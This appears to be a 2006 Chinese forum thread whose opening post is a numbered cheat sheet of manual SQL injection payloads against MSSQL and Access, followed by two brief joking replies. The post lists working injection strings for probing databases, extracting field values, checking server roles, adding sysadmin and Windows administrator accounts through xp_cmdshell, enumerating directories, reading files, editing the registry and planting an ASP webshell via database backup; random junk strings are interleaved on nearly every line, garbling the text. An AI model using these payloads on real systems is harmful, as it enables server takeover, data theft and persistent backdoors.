社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3931阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 }@g#S@o  
  2.初步判断是否是mssql ;and user>0 YZp]vlm~  
OH~I+=}.  
  3.注入参数是字符'and [查询条件] and ''=' m*TJ@gI*t  
k12mxR/  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' $h'>Zvf  
GoKMi[b  
  5.判断数据库系统 ?s: 2~Qlu  
|7G=f9V  
  ;and (select count(*) from sysobjects)>0 mssql " gi 1{  
GSg/I.)S  
  ;and (select count(*) from msysobjects)>0 access N~ M-|^L  
VW9BQs2w  
LtBm }0  
f.u[!T  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 K 7d]p0d'  
e+O0l  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Jm G)=$,  
u|E9X[%  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5,W DmhJ  
e@{8G^o>D  
  9.(1)猜字段的ascii值(access) {\-IAuM  
cX@72  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 gOA]..lh  
*AN2&>Y  
  (2)猜字段的ascii值(mssql) Z9 tjo1X  
KRP)y{~o  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Hk;) l3oB  
!8>tT  
  10.测试权限结构(mssql) F!yejn [  
?gOZY\[ma  
.e%B'  
Nv_"?er+y  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <rFY$ ?x  
:ug j+  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >=Un=Q%  
g\ p;  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- p[-bu B]  
EK}f-Xei  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- DvvjIYB~  
u-E*_% y  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- KcX] g*wy  
@~<M_63  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- cLe659&  
kVe_2oQ_>  
  ;and 1=(select IS_MEMBER('db_owner'));-- uia-w^F e  
?k*s!YCZ  
O WVa&8O  
Y: XxTa*  
  11.添加mssql和系统的帐户 `l95I7  
skP2IMa75  
  ;exec master.dbo.sp_addlogin username;-- g4^df%)&  
  ;exec master.dbo.sp_password null,username,password;-- CEos`  
D +vHl}  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- E`SFr  
hUy\)GsT  
  ;exec master.dbo.xp_cmdshell 'net user username password G>0S( M)  
u9"1%  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- }x1*4+Y1  
rz%=qY  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- y2eeE CS]  
Awad!_VdHS  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- n.$wW =  
C.$`HGv  
C0F#PXU y  
<w d+cPZQr  
  12.(1)遍历目录 kiFTx &gf  
sX,oJIt  
  ;create table dirs(paths varchar(100), id int) e'uI~%$NJL  
?gMxGH:B.&  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' ?5!>k^q  
G6(U\VFqO  
  ;and (select top 1 paths from dirs)>0 ;F;`y),  
+<P%v k  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ')/yBH9mR  
2*K _RMr~  
7.PG*q  
wZm=h8d  
  (2)遍历目录 )_nc;&%w  
n1xN:A  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- "p~1| ?T  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 QviH+9  
p}NIZ)]$  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *a7&v3X  
u@$C i/J*  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 u;Q'xuo3  
b;O|-2AR  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 T.zU erbO  
 %Ln7{w  
Y|=/*?o}  
F? kW{,*  
  13.mssql中的存储过程 |8b*BnS  
e8@@Pi<sB  
  xp_regenumvalues 注册表根键, 子键 &Q[Y&vNn  
dkC[Jt  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 do9@6[{Sv  
0 ej!!WP  
  xp_regread 根键,子键,键值名 Fss7xP'  
YoKY&i6r}  
  ;exec xp_regread S/|'ggC  
qmcLG*^,  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 dM(}1%2  
lk6*?EJ  
  xp_regwrite 根键,子键, 值名, 值类型, 值 . 4"9o%  
NGlX%j4j  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 AoEG%nT  
]3C&l+m$ot  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 X'Dg= |  
EF?@f{YY$n  
  xp_regdeletevalue 根键,子键,值名 zM^ux!T=  
4w:_4qyb  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7  Znr2I  
HKk;oG  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 dD3I.?DY  
MH`H[2<\!,  
0SXWt? }  
)IGE2k|  
  14.mssql的backup创建webshell XU Hu=2F  
(DCC4%w"  
  use model cZN+D D  
P"%i 4-S  
  create table cmd(str image); N&!qu r \  
WKFmU0RK  
  insert into cmd(str) values (''); 3r?Bnf:  
I#D{6%~  
  backup database model to disk='c:\l.asp'; /YWoDHL  
3 [lF  
y_$=Pu6H  
HPAd@5d(  
  15.mssql内置函数 MX 2UYZ&  
'Lft\.C  
  ;and (select @@version)>0 获得Windows的版本号 Uc6BI$Fmz  
kn_%'7  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa m-lUgx7  
Cyxt EzPp  
  ;and (select user_name())>0 爆当前系统的连接用户 `5;O|qRq  
#e0tT+  
  ;and (select db_name())>0 得到当前连接的数据库 !6ZkLE[XJ<  
3VbQDPG  
ip4:px-  
C26PQGo#$  
  16.简洁的webshell ^.F@yo2}  
g83!il\  
  use model ]BU,*YaB  
ik77i?Hg  
  create table cmd(str image); &3mseU  
jYet!l  
  insert into cmd(str) values (''); &%`IPhbT  
6>)]7(B<d  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八